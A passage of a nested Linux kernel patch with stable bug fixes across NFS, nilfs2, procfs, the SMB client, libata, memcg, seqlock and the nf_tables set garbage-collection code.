+-static void nfs_clear_request_commit(struct nfs_page *req);
++static void nfs_clear_request_commit(struct nfs_commit_info *cinfo,
++				     struct nfs_page *req);
+ static void nfs_init_cinfo_from_inode(struct nfs_commit_info *cinfo,
+ 				      struct inode *inode);
+ static struct nfs_page *
+@@ -502,8 +503,8 @@ nfs_destroy_unlinked_subrequests(struct nfs_page *destroy_list,
+  * the (former) group.  All subrequests are removed from any write or commit
+  * lists, unlinked from the group and destroyed.
+  */
+-void
+-nfs_join_page_group(struct nfs_page *head, struct inode *inode)
++void nfs_join_page_group(struct nfs_page *head, struct nfs_commit_info *cinfo,
++			 struct inode *inode)
+ {
+ 	struct nfs_page *subreq;
+ 	struct nfs_page *destroy_list = NULL;
+@@ -533,7 +534,7 @@ nfs_join_page_group(struct nfs_page *head, struct inode *inode)
+ 	 * Commit list removal accounting is done after locks are dropped */
+ 	subreq = head;
+ 	do {
+-		nfs_clear_request_commit(subreq);
++		nfs_clear_request_commit(cinfo, subreq);
+ 		subreq = subreq->wb_this_page;
+ 	} while (subreq != head);
+ 
+@@ -567,8 +568,10 @@ nfs_lock_and_join_requests(struct page *page)
+ {
+ 	struct inode *inode = page_file_mapping(page)->host;
+ 	struct nfs_page *head;
++	struct nfs_commit_info cinfo;
+ 	int ret;
+ 
++	nfs_init_cinfo_from_inode(&cinfo, inode);
+ 	/*
+ 	 * A reference is taken only on the head request which acts as a
+ 	 * reference to the whole page group - the group will not be destroyed
+@@ -585,7 +588,7 @@ nfs_lock_and_join_requests(struct page *page)
+ 		return ERR_PTR(ret);
+ 	}
+ 
+-	nfs_join_page_group(head, inode);
++	nfs_join_page_group(head, &cinfo, inode);
+ 
+ 	return head;
+ }
+@@ -956,18 +959,16 @@ nfs_clear_page_commit(struct page *page)
+ }
+ 
+ /* Called holding the request lock on @req */
+-static void
+-nfs_clear_request_commit(struct nfs_page *req)
++static void nfs_clear_request_commit(struct nfs_commit_info *cinfo,
++				     struct nfs_page *req)
+ {
+ 	if (test_bit(PG_CLEAN, &req->wb_flags)) {
+ 		struct nfs_open_context *ctx = nfs_req_openctx(req);
+ 		struct inode *inode = d_inode(ctx->dentry);
+-		struct nfs_commit_info cinfo;
+ 
+-		nfs_init_cinfo_from_inode(&cinfo, inode);
+ 		mutex_lock(&NFS_I(inode)->commit_mutex);
+-		if (!pnfs_clear_request_commit(req, &cinfo)) {
+-			nfs_request_remove_commit_list(req, &cinfo);
++		if (!pnfs_clear_request_commit(req, cinfo)) {
++			nfs_request_remove_commit_list(req, cinfo);
+ 		}
+ 		mutex_unlock(&NFS_I(inode)->commit_mutex);
+ 		nfs_clear_page_commit(req->wb_page);
+diff --git a/fs/nilfs2/gcinode.c b/fs/nilfs2/gcinode.c
+index b0d22ff24b674..fcd13da5d0125 100644
+--- a/fs/nilfs2/gcinode.c
++++ b/fs/nilfs2/gcinode.c
+@@ -73,10 +73,8 @@ int nilfs_gccache_submit_read_data(struct inode *inode, sector_t blkoff,
+ 		struct the_nilfs *nilfs = inode->i_sb->s_fs_info;
+ 
+ 		err = nilfs_dat_translate(nilfs->ns_dat, vbn, &pbn);
+-		if (unlikely(err)) { /* -EIO, -ENOMEM, -ENOENT */
+-			brelse(bh);
++		if (unlikely(err)) /* -EIO, -ENOMEM, -ENOENT */
+ 			goto failed;
+-		}
+ 	}
+ 
+ 	lock_buffer(bh);
+@@ -102,6 +100,8 @@ int nilfs_gccache_submit_read_data(struct inode *inode, sector_t blkoff,
+  failed:
+ 	unlock_page(bh->b_page);
+ 	put_page(bh->b_page);
++	if (unlikely(err))
++		brelse(bh);
+ 	return err;
+ }
+ 
+diff --git a/fs/proc/internal.h b/fs/proc/internal.h
+index b701d0207edf0..6b921826d85b6 100644
+--- a/fs/proc/internal.h
++++ b/fs/proc/internal.h
+@@ -289,9 +289,7 @@ struct proc_maps_private {
+ 	struct inode *inode;
+ 	struct task_struct *task;
+ 	struct mm_struct *mm;
+-#ifdef CONFIG_MMU
+ 	struct vma_iterator iter;
+-#endif
+ #ifdef CONFIG_NUMA
+ 	struct mempolicy *task_mempolicy;
+ #endif
+diff --git a/fs/proc/task_nommu.c b/fs/proc/task_nommu.c
+index 2fd06f52b6a44..dc05780f93e13 100644
+--- a/fs/proc/task_nommu.c
++++ b/fs/proc/task_nommu.c
+@@ -188,15 +188,28 @@ static int show_map(struct seq_file *m, void *_p)
+ 	return nommu_vma_show(m, _p);
+ }
+ 
+-static void *m_start(struct seq_file *m, loff_t *pos)
++static struct vm_area_struct *proc_get_vma(struct proc_maps_private *priv,
++						loff_t *ppos)
++{
++	struct vm_area_struct *vma = vma_next(&priv->iter);
++
++	if (vma) {
++		*ppos = vma->vm_start;
++	} else {
++		*ppos = -1UL;
++	}
++
++	return vma;
++}
++
++static void *m_start(struct seq_file *m, loff_t *ppos)
+ {
+ 	struct proc_maps_private *priv = m->private;
++	unsigned long last_addr = *ppos;
+ 	struct mm_struct *mm;
+-	struct vm_area_struct *vma;
+-	unsigned long addr = *pos;
+ 
+-	/* See m_next(). Zero at the start or after lseek. */
+-	if (addr == -1UL)
++	/* See proc_get_vma(). Zero at the start or after lseek. */
++	if (last_addr == -1UL)
+ 		return NULL;
+ 
+ 	/* pin the task and mm whilst we play with them */
+@@ -205,44 +218,41 @@ static void *m_start(struct seq_file *m, loff_t *pos)
+ 		return ERR_PTR(-ESRCH);
+ 
+ 	mm = priv->mm;
+-	if (!mm || !mmget_not_zero(mm))
++	if (!mm || !mmget_not_zero(mm)) {
++		put_task_struct(priv->task);
++		priv->task = NULL;
+ 		return NULL;
++	}
+ 
+ 	if (mmap_read_lock_killable(mm)) {
+ 		mmput(mm);
++		put_task_struct(priv->task);
++		priv->task = NULL;
+ 		return ERR_PTR(-EINTR);
+ 	}
+ 
+-	/* start the next element from addr */
+-	vma = find_vma(mm, addr);
+-	if (vma)
+-		return vma;
++	vma_iter_init(&priv->iter, mm, last_addr);
+ 
+-	mmap_read_unlock(mm);
+-	mmput(mm);
+-	return NULL;
++	return proc_get_vma(priv, ppos);
+ }
+ 
+-static void m_stop(struct seq_file *m, void *_vml)
++static void m_stop(struct seq_file *m, void *v)
+ {
+ 	struct proc_maps_private *priv = m->private;
++	struct mm_struct *mm = priv->mm;
+ 
+-	if (!IS_ERR_OR_NULL(_vml)) {
+-		mmap_read_unlock(priv->mm);
+-		mmput(priv->mm);
+-	}
+-	if (priv->task) {
+-		put_task_struct(priv->task);
+-		priv->task = NULL;
+-	}
++	if (!priv->task)
++		return;
++
++	mmap_read_unlock(mm);
++	mmput(mm);
++	put_task_struct(priv->task);
++	priv->task = NULL;
+ }
+ 
+-static void *m_next(struct seq_file *m, void *_p, loff_t *pos)
++static void *m_next(struct seq_file *m, void *_p, loff_t *ppos)
+ {
+-	struct vm_area_struct *vma = _p;
+-
+-	*pos = vma->vm_end;
+-	return find_vma(vma->vm_mm, vma->vm_end);
++	return proc_get_vma(m->private, ppos);
+ }
+ 
+ static const struct seq_operations proc_pid_maps_ops = {
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 03f34ec63e10d..39602f39aea8f 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -1776,6 +1776,7 @@ static inline bool is_retryable_error(int error)
+ #define   MID_RETRY_NEEDED      8 /* session closed while this request out */
+ #define   MID_RESPONSE_MALFORMED 0x10
+ #define   MID_SHUTDOWN		 0x20
++#define   MID_RESPONSE_READY 0x40 /* ready for other process handle the rsp */
+ 
+ /* Flags */
+ #define   MID_WAIT_CANCELLED	 1 /* Cancelled while waiting for response */
+diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
+index e2e2ef0fa9a0f..f4818599c00a2 100644
+--- a/fs/smb/client/fs_context.c
++++ b/fs/smb/client/fs_context.c
+@@ -1487,6 +1487,7 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
+ 
+  cifs_parse_mount_err:
+ 	kfree_sensitive(ctx->password);
++	ctx->password = NULL;
+ 	return -EINVAL;
+ }
+ 
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 92c1ed9304be7..9531ea2430899 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -2605,7 +2605,7 @@ int cifs_fiemap(struct inode *inode, struct fiemap_extent_info *fei, u64 start,
+ 	}
+ 
+ 	cifsFileInfo_put(cfile);
+-	return -ENOTSUPP;
++	return -EOPNOTSUPP;
+ }
+ 
+ int cifs_truncate_page(struct address_space *mapping, loff_t from)
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 1387d5126f53b..efff7137412b4 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -292,7 +292,7 @@ smb2_adjust_credits(struct TCP_Server_Info *server,
+ 		cifs_server_dbg(VFS, "request has less credits (%d) than required (%d)",
+ 				credits->value, new_val);
+ 
+-		return -ENOTSUPP;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	spin_lock(&server->req_lock);
+@@ -1155,7 +1155,7 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 			/* Use a fudge factor of 256 bytes in case we collide
+ 			 * with a different set_EAs command.
+ 			 */
+-			if(CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
++			if (CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
+ 			   MAX_SMB2_CLOSE_RESPONSE_SIZE - 256 <
+ 			   used_len + ea_name_len + ea_value_len + 1) {
+ 				rc = -ENOSPC;
+@@ -4721,7 +4721,7 @@ handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid,
+ 
+ 	if (shdr->Command != SMB2_READ) {
+ 		cifs_server_dbg(VFS, "only big read responses are supported\n");
+-		return -ENOTSUPP;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	if (server->ops->is_session_expired &&
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index e03ffcf7e201c..87aea456ee903 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -35,6 +35,8 @@
+ void
+ cifs_wake_up_task(struct mid_q_entry *mid)
+ {
++	if (mid->mid_state == MID_RESPONSE_RECEIVED)
++		mid->mid_state = MID_RESPONSE_READY;
+ 	wake_up_process(mid->callback_data);
+ }
+ 
+@@ -87,7 +89,8 @@ static void __release_mid(struct kref *refcount)
+ 	struct TCP_Server_Info *server = midEntry->server;
+ 
+ 	if (midEntry->resp_buf && (midEntry->mid_flags & MID_WAIT_CANCELLED) &&
+-	    midEntry->mid_state == MID_RESPONSE_RECEIVED &&
++	    (midEntry->mid_state == MID_RESPONSE_RECEIVED ||
++	     midEntry->mid_state == MID_RESPONSE_READY) &&
+ 	    server->ops->handle_cancelled_mid)
+ 		server->ops->handle_cancelled_mid(midEntry, server);
+ 
+@@ -759,7 +762,8 @@ wait_for_response(struct TCP_Server_Info *server, struct mid_q_entry *midQ)
+ 	int error;
+ 
+ 	error = wait_event_state(server->response_q,
+-				 midQ->mid_state != MID_REQUEST_SUBMITTED,
++				 midQ->mid_state != MID_REQUEST_SUBMITTED &&
++				 midQ->mid_state != MID_RESPONSE_RECEIVED,
+ 				 (TASK_KILLABLE|TASK_FREEZABLE_UNSAFE));
+ 	if (error < 0)
+ 		return -ERESTARTSYS;
+@@ -912,7 +916,7 @@ cifs_sync_mid_result(struct mid_q_entry *mid, struct TCP_Server_Info *server)
+ 
+ 	spin_lock(&server->mid_lock);
+ 	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
++	case MID_RESPONSE_READY:
+ 		spin_unlock(&server->mid_lock);
+ 		return rc;
+ 	case MID_RETRY_NEEDED:
+@@ -1011,6 +1015,9 @@ cifs_compound_callback(struct mid_q_entry *mid)
+ 	credits.instance = server->reconnect_instance;
+ 
+ 	add_credits(server, &credits, mid->optype);
++
++	if (mid->mid_state == MID_RESPONSE_RECEIVED)
++		mid->mid_state = MID_RESPONSE_READY;
+ }
+ 
+ static void
+@@ -1206,7 +1213,8 @@ compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+ 			send_cancel(server, &rqst[i], midQ[i]);
+ 			spin_lock(&server->mid_lock);
+ 			midQ[i]->mid_flags |= MID_WAIT_CANCELLED;
+-			if (midQ[i]->mid_state == MID_REQUEST_SUBMITTED) {
++			if (midQ[i]->mid_state == MID_REQUEST_SUBMITTED ||
++			    midQ[i]->mid_state == MID_RESPONSE_RECEIVED) {
+ 				midQ[i]->callback = cifs_cancelled_callback;
+ 				cancelled_mid[i] = true;
+ 				credits[i].value = 0;
+@@ -1227,7 +1235,7 @@ compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+ 		}
+ 
+ 		if (!midQ[i]->resp_buf ||
+-		    midQ[i]->mid_state != MID_RESPONSE_RECEIVED) {
++		    midQ[i]->mid_state != MID_RESPONSE_READY) {
+ 			rc = -EIO;
+ 			cifs_dbg(FYI, "Bad MID state?\n");
+ 			goto out;
+@@ -1414,7 +1422,8 @@ SendReceive(const unsigned int xid, struct cifs_ses *ses,
+ 	if (rc != 0) {
+ 		send_cancel(server, &rqst, midQ);
+ 		spin_lock(&server->mid_lock);
+-		if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
++		if (midQ->mid_state == MID_REQUEST_SUBMITTED ||
++		    midQ->mid_state == MID_RESPONSE_RECEIVED) {
+ 			/* no longer considered to be "in-flight" */
+ 			midQ->callback = release_mid;
+ 			spin_unlock(&server->mid_lock);
+@@ -1431,7 +1440,7 @@ SendReceive(const unsigned int xid, struct cifs_ses *ses,
+ 	}
+ 
+ 	if (!midQ->resp_buf || !out_buf ||
+-	    midQ->mid_state != MID_RESPONSE_RECEIVED) {
++	    midQ->mid_state != MID_RESPONSE_READY) {
+ 		rc = -EIO;
+ 		cifs_server_dbg(VFS, "Bad MID state?\n");
+ 		goto out;
+@@ -1555,14 +1564,16 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	/* Wait for a reply - allow signals to interrupt. */
+ 	rc = wait_event_interruptible(server->response_q,
+-		(!(midQ->mid_state == MID_REQUEST_SUBMITTED)) ||
++		(!(midQ->mid_state == MID_REQUEST_SUBMITTED ||
++		   midQ->mid_state == MID_RESPONSE_RECEIVED)) ||
+ 		((server->tcpStatus != CifsGood) &&
+ 		 (server->tcpStatus != CifsNew)));
+ 
+ 	/* Were we interrupted by a signal ? */
+ 	spin_lock(&server->srv_lock);
+ 	if ((rc == -ERESTARTSYS) &&
+-		(midQ->mid_state == MID_REQUEST_SUBMITTED) &&
++		(midQ->mid_state == MID_REQUEST_SUBMITTED ||
++		 midQ->mid_state == MID_RESPONSE_RECEIVED) &&
+ 		((server->tcpStatus == CifsGood) ||
+ 		 (server->tcpStatus == CifsNew))) {
+ 		spin_unlock(&server->srv_lock);
+@@ -1593,7 +1604,8 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 		if (rc) {
+ 			send_cancel(server, &rqst, midQ);
+ 			spin_lock(&server->mid_lock);
+-			if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
++			if (midQ->mid_state == MID_REQUEST_SUBMITTED ||
++			    midQ->mid_state == MID_RESPONSE_RECEIVED) {
+ 				/* no longer considered to be "in-flight" */
+ 				midQ->callback = release_mid;
+ 				spin_unlock(&server->mid_lock);
+@@ -1613,7 +1625,7 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 		return rc;
+ 
+ 	/* rcvd frame is ok */
+-	if (out_buf == NULL || midQ->mid_state != MID_RESPONSE_RECEIVED) {
++	if (out_buf == NULL || midQ->mid_state != MID_RESPONSE_READY) {
+ 		rc = -EIO;
+ 		cifs_tcon_dbg(VFS, "Bad MID state?\n");
+ 		goto out;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index b3d3aa8437dce..1ed2ec035e779 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -301,7 +301,7 @@ static inline void bpf_long_memcpy(void *dst, const void *src, u32 size)
+ 
+ 	size /= sizeof(long);
+ 	while (size--)
+-		*ldst++ = *lsrc++;
++		data_race(*ldst++ = *lsrc++);
+ }
+ 
+ /* copy everything but bpf_spin_lock, bpf_timer, and kptrs. There could be one of each. */
+diff --git a/include/linux/btf_ids.h b/include/linux/btf_ids.h
+index 2b98720084285..0f02bbb205735 100644
+--- a/include/linux/btf_ids.h
++++ b/include/linux/btf_ids.h
+@@ -49,7 +49,7 @@ word							\
+ 	____BTF_ID(symbol, word)
+ 
+ #define __ID(prefix) \
+-	__PASTE(prefix, __COUNTER__)
++	__PASTE(__PASTE(prefix, __COUNTER__), __LINE__)
+ 
+ /*
+  * The BTF_ID defines unique symbol for each ID pointing
+diff --git a/include/linux/if_team.h b/include/linux/if_team.h
+index 8de6b6e678295..34bcba5a70677 100644
+--- a/include/linux/if_team.h
++++ b/include/linux/if_team.h
+@@ -189,6 +189,8 @@ struct team {
+ 	struct net_device *dev; /* associated netdevice */
+ 	struct team_pcpu_stats __percpu *pcpu_stats;
+ 
++	const struct header_ops *header_ops_cache;
++
+ 	struct mutex lock; /* used for overall locking, e.g. port lists write */
+ 
+ 	/*
+diff --git a/include/linux/interrupt.h b/include/linux/interrupt.h
+index a92bce40b04b3..4a1dc88ddbff9 100644
+--- a/include/linux/interrupt.h
++++ b/include/linux/interrupt.h
+@@ -569,8 +569,12 @@ enum
+  * 	2) rcu_report_dead() reports the final quiescent states.
+  *
+  * _ IRQ_POLL: irq_poll_cpu_dead() migrates the queue
++ *
++ * _ (HR)TIMER_SOFTIRQ: (hr)timers_dead_cpu() migrates the queue
+  */
+-#define SOFTIRQ_HOTPLUG_SAFE_MASK (BIT(RCU_SOFTIRQ) | BIT(IRQ_POLL_SOFTIRQ))
++#define SOFTIRQ_HOTPLUG_SAFE_MASK (BIT(TIMER_SOFTIRQ) | BIT(IRQ_POLL_SOFTIRQ) |\
++				   BIT(HRTIMER_SOFTIRQ) | BIT(RCU_SOFTIRQ))
++
+ 
+ /* map softirq index to softirq name. update 'softirq_to_name' in
+  * kernel/softirq.c when adding a new softirq.
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index 4c9b322bb3d88..a9ec8d97a715b 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -253,7 +253,7 @@ enum {
+ 	 * advised to wait only for the following duration before
+ 	 * doing SRST.
+ 	 */
+-	ATA_TMOUT_PMP_SRST_WAIT	= 5000,
++	ATA_TMOUT_PMP_SRST_WAIT	= 10000,
+ 
+ 	/* When the LPM policy is set to ATA_LPM_MAX_POWER, there might
+ 	 * be a spurious PHY event, so ignore the first PHY event that
+@@ -1136,6 +1136,7 @@ extern int ata_std_bios_param(struct scsi_device *sdev,
+ 			      struct block_device *bdev,
+ 			      sector_t capacity, int geom[]);
+ extern void ata_scsi_unlock_native_capacity(struct scsi_device *sdev);
++extern int ata_scsi_slave_alloc(struct scsi_device *sdev);
+ extern int ata_scsi_slave_config(struct scsi_device *sdev);
+ extern void ata_scsi_slave_destroy(struct scsi_device *sdev);
+ extern int ata_scsi_change_queue_depth(struct scsi_device *sdev,
+@@ -1384,6 +1385,7 @@ extern const struct attribute_group *ata_common_sdev_groups[];
+ 	.this_id		= ATA_SHT_THIS_ID,		\
+ 	.emulated		= ATA_SHT_EMULATED,		\
+ 	.proc_name		= drv_name,			\
++	.slave_alloc		= ata_scsi_slave_alloc,		\
+ 	.slave_destroy		= ata_scsi_slave_destroy,	\
+ 	.bios_param		= ata_std_bios_param,		\
+ 	.unlock_native_capacity	= ata_scsi_unlock_native_capacity,\
+diff --git a/include/linux/memcontrol.h b/include/linux/memcontrol.h
+index 099521835cd14..50a078a31734c 100644
+--- a/include/linux/memcontrol.h
++++ b/include/linux/memcontrol.h
+@@ -902,7 +902,7 @@ unsigned long mem_cgroup_get_zone_lru_size(struct lruvec *lruvec,
+ 	return READ_ONCE(mz->lru_zone_size[zone_idx][lru]);
+ }
+ 
+-void mem_cgroup_handle_over_high(void);
++void mem_cgroup_handle_over_high(gfp_t gfp_mask);
+ 
+ unsigned long mem_cgroup_get_max(struct mem_cgroup *memcg);
+ 
+@@ -1437,7 +1437,7 @@ static inline void mem_cgroup_unlock_pages(void)
+ 	rcu_read_unlock();
+ }
+ 
+-static inline void mem_cgroup_handle_over_high(void)
++static inline void mem_cgroup_handle_over_high(gfp_t gfp_mask)
+ {
+ }
+ 
+diff --git a/include/linux/nfs_fs_sb.h b/include/linux/nfs_fs_sb.h
+index ea2f7e6b1b0b5..ef8ba5fbc6503 100644
+--- a/include/linux/nfs_fs_sb.h
++++ b/include/linux/nfs_fs_sb.h
+@@ -48,6 +48,7 @@ struct nfs_client {
+ #define NFS_CS_NOPING		6		/* - don't ping on connect */
+ #define NFS_CS_DS		7		/* - Server is a DS */
+ #define NFS_CS_REUSEPORT	8		/* - reuse src port on reconnect */
++#define NFS_CS_PNFS		9		/* - Server used for pnfs */
+ 	struct sockaddr_storage	cl_addr;	/* server identifier */
+ 	size_t			cl_addrlen;
+ 	char *			cl_hostname;	/* hostname of server */
+diff --git a/include/linux/nfs_page.h b/include/linux/nfs_page.h
+index ba7e2e4b09264..e39a8cf8b1797 100644
+--- a/include/linux/nfs_page.h
++++ b/include/linux/nfs_page.h
+@@ -145,7 +145,9 @@ extern	void nfs_unlock_request(struct nfs_page *req);
+ extern	void nfs_unlock_and_release_request(struct nfs_page *);
+ extern	struct nfs_page *nfs_page_group_lock_head(struct nfs_page *req);
+ extern	int nfs_page_group_lock_subrequests(struct nfs_page *head);
+-extern	void nfs_join_page_group(struct nfs_page *head, struct inode *inode);
++extern void nfs_join_page_group(struct nfs_page *head,
++				struct nfs_commit_info *cinfo,
++				struct inode *inode);
+ extern int nfs_page_group_lock(struct nfs_page *);
+ extern void nfs_page_group_unlock(struct nfs_page *);
+ extern bool nfs_page_group_sync_on_bit(struct nfs_page *, unsigned int);
+diff --git a/include/linux/resume_user_mode.h b/include/linux/resume_user_mode.h
+index 2851894544496..f8f3e958e9cf2 100644
+--- a/include/linux/resume_user_mode.h
++++ b/include/linux/resume_user_mode.h
+@@ -55,7 +55,7 @@ static inline void resume_user_mode_work(struct pt_regs *regs)
+ 	}
+ #endif
+ 
+-	mem_cgroup_handle_over_high();
++	mem_cgroup_handle_over_high(GFP_KERNEL);
+ 	blkcg_maybe_throttle_current();
+ 
+ 	rseq_handle_notify_resume(NULL, regs);
+diff --git a/include/linux/seqlock.h b/include/linux/seqlock.h
+index 3926e90279477..d778af83c8f36 100644
+--- a/include/linux/seqlock.h
++++ b/include/linux/seqlock.h
+@@ -512,8 +512,8 @@ do {									\
+ 
+ static inline void do_write_seqcount_begin_nested(seqcount_t *s, int subclass)
+ {
+-	do_raw_write_seqcount_begin(s);
+ 	seqcount_acquire(&s->dep_map, subclass, 0, _RET_IP_);
++	do_raw_write_seqcount_begin(s);
+ }
+ 
+ /**
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index c752b6f509791..d1f81a6d7773b 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -507,6 +507,7 @@ struct nft_set_elem_expr {
+  *
+  *	@list: table set list node
+  *	@bindings: list of set bindings
++ *	@refs: internal refcounting for async set destruction
+  *	@table: table this set belongs to
+  *	@net: netnamespace this set belongs to
+  * 	@name: name of the set
+@@ -528,6 +529,7 @@ struct nft_set_elem_expr {
+  *	@expr: stateful expression
+  * 	@ops: set ops
+  * 	@flags: set flags
++ *	@dead: set will be freed, never cleared
+  *	@genmask: generation mask
+  * 	@klen: key length
+  * 	@dlen: data length
+@@ -536,6 +538,7 @@ struct nft_set_elem_expr {
+ struct nft_set {
+ 	struct list_head		list;
+ 	struct list_head		bindings;
++	refcount_t			refs;
+ 	struct nft_table		*table;
+ 	possible_net_t			net;
+ 	char				*name;
+@@ -557,7 +560,8 @@ struct nft_set {
+ 	struct list_head		pending_update;
+ 	/* runtime data below here */
+ 	const struct nft_set_ops	*ops ____cacheline_aligned;
+-	u16				flags:14,
++	u16				flags:13,
++					dead:1,
+ 					genmask:2;
+ 	u8				klen;
+ 	u8				dlen;
+@@ -578,6 +582,11 @@ static inline void *nft_set_priv(const struct nft_set *set)
+ 	return (void *)set->data;
+ }
+ 
++static inline bool nft_set_gc_is_pending(const struct nft_set *s)
++{
++	return refcount_read(&s->refs) != 1;
++}
++
+ static inline struct nft_set *nft_set_container_of(const void *priv)
+ {
+ 	return (void *)priv - offsetof(struct nft_set, data);
+@@ -591,7 +600,6 @@ struct nft_set *nft_set_lookup_global(const struct net *net,
+ 
+ struct nft_set_ext *nft_set_catchall_lookup(const struct net *net,
+ 					    const struct nft_set *set);
+-void *nft_set_catchall_gc(const struct nft_set *set);
+ 
+ static inline unsigned long nft_set_gc_interval(const struct nft_set *set)
+ {
+@@ -808,62 +816,6 @@ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
+ 				const struct nft_set *set, void *elem);
+ 
+-/**
+- *	struct nft_set_gc_batch_head - nf_tables set garbage collection batch
+- *
+- *	@rcu: rcu head
+- *	@set: set the elements belong to
+- *	@cnt: count of elements
+- */
+-struct nft_set_gc_batch_head {
+-	struct rcu_head			rcu;
+-	const struct nft_set		*set;
+-	unsigned int			cnt;
+-};
+-
+-#define NFT_SET_GC_BATCH_SIZE	((PAGE_SIZE -				  \
+-				  sizeof(struct nft_set_gc_batch_head)) / \
+-				 sizeof(void *))
+-
+-/**
+- *	struct nft_set_gc_batch - nf_tables set garbage collection batch
+- *
+- * 	@head: GC batch head
+- * 	@elems: garbage collection elements
+- */
+-struct nft_set_gc_batch {
+-	struct nft_set_gc_batch_head	head;
+-	void				*elems[NFT_SET_GC_BATCH_SIZE];
+-};
+-
+-struct nft_set_gc_batch *nft_set_gc_batch_alloc(const struct nft_set *set,
+-						gfp_t gfp);
+-void nft_set_gc_batch_release(struct rcu_head *rcu);
+-
+-static inline void nft_set_gc_batch_complete(struct nft_set_gc_batch *gcb)
+-{
+-	if (gcb != NULL)
+-		call_rcu(&gcb->head.rcu, nft_set_gc_batch_release);
+-}
+-
+-static inline struct nft_set_gc_batch *
+-nft_set_gc_batch_check(const struct nft_set *set, struct nft_set_gc_batch *gcb,
+-		       gfp_t gfp)
+-{
+-	if (gcb != NULL) {
+-		if (gcb->head.cnt + 1 < ARRAY_SIZE(gcb->elems))
+-			return gcb;
+-		nft_set_gc_batch_complete(gcb);
+-	}
+-	return nft_set_gc_batch_alloc(set, gfp);
+-}
+-
+-static inline void nft_set_gc_batch_add(struct nft_set_gc_batch *gcb,
+-					void *elem)
+-{
+-	gcb->elems[gcb->head.cnt++] = elem;
+-}
+-
+ struct nft_expr_ops;
+ /**
+  *	struct nft_expr_type - nf_tables expression type
+@@ -1542,39 +1494,30 @@ static inline void nft_set_elem_change_active(const struct net *net,
+ 
+ #endif /* IS_ENABLED(CONFIG_NF_TABLES) */
+ 
+-/*
+- * We use a free bit in the genmask field to indicate the element
+- * is busy, meaning it is currently being processed either by
+- * the netlink API or GC.
+- *
+- * Even though the genmask is only a single byte wide, this works
+- * because the extension structure if fully constant once initialized,
+- * so there are no non-atomic write accesses unless it is already
+- * marked busy.
+- */
+-#define NFT_SET_ELEM_BUSY_MASK	(1 << 2)
++#define NFT_SET_ELEM_DEAD_MASK	(1 << 2)
+ 
+ #if defined(__LITTLE_ENDIAN_BITFIELD)
+-#define NFT_SET_ELEM_BUSY_BIT	2
++#define NFT_SET_ELEM_DEAD_BIT	2
+ #elif defined(__BIG_ENDIAN_BITFIELD)
+-#define NFT_SET_ELEM_BUSY_BIT	(BITS_PER_LONG - BITS_PER_BYTE + 2)
++#define NFT_SET_ELEM_DEAD_BIT	(BITS_PER_LONG - BITS_PER_BYTE + 2)
+ #else
+ #error
+ #endif
+ 
+-static inline int nft_set_elem_mark_busy(struct nft_set_ext *ext)
++static inline void nft_set_elem_dead(struct nft_set_ext *ext)
+ {
+ 	unsigned long *word = (unsigned long *)ext;
+ 
+ 	BUILD_BUG_ON(offsetof(struct nft_set_ext, genmask) != 0);
+-	return test_and_set_bit(NFT_SET_ELEM_BUSY_BIT, word);
++	set_bit(NFT_SET_ELEM_DEAD_BIT, word);
+ }
+ 
+-static inline void nft_set_elem_clear_busy(struct nft_set_ext *ext)
++static inline int nft_set_elem_is_dead(const struct nft_set_ext *ext)
+ {
+ 	unsigned long *word = (unsigned long *)ext;
+ 
+-	clear_bit(NFT_SET_ELEM_BUSY_BIT, word);
++	BUILD_BUG_ON(offsetof(struct nft_set_ext, genmask) != 0);
++	return test_bit(NFT_SET_ELEM_DEAD_BIT, word);
+ }
+ 
+ /**
+@@ -1708,6 +1651,39 @@ struct nft_trans_flowtable {
+ #define nft_trans_flowtable_flags(trans)	\
+ 	(((struct nft_trans_flowtable *)trans->data)->flags)
+ 
++#define NFT_TRANS_GC_BATCHCOUNT	256
++
++struct nft_trans_gc {
++	struct list_head	list;
++	struct net		*net;
++	struct nft_set		*set;
++	u32			seq;
++	u16			count;
++	void			*priv[NFT_TRANS_GC_BATCHCOUNT];
++	struct rcu_head		rcu;
++};
++
++struct nft_trans_gc *nft_trans_gc_alloc(struct nft_set *set,
++					unsigned int gc_seq, gfp_t gfp);
++void nft_trans_gc_destroy(struct nft_trans_gc *trans);
++
++struct nft_trans_gc *nft_trans_gc_queue_async(struct nft_trans_gc *gc,
++					      unsigned int gc_seq, gfp_t gfp);
++void nft_trans_gc_queue_async_done(struct nft_trans_gc *gc);
++
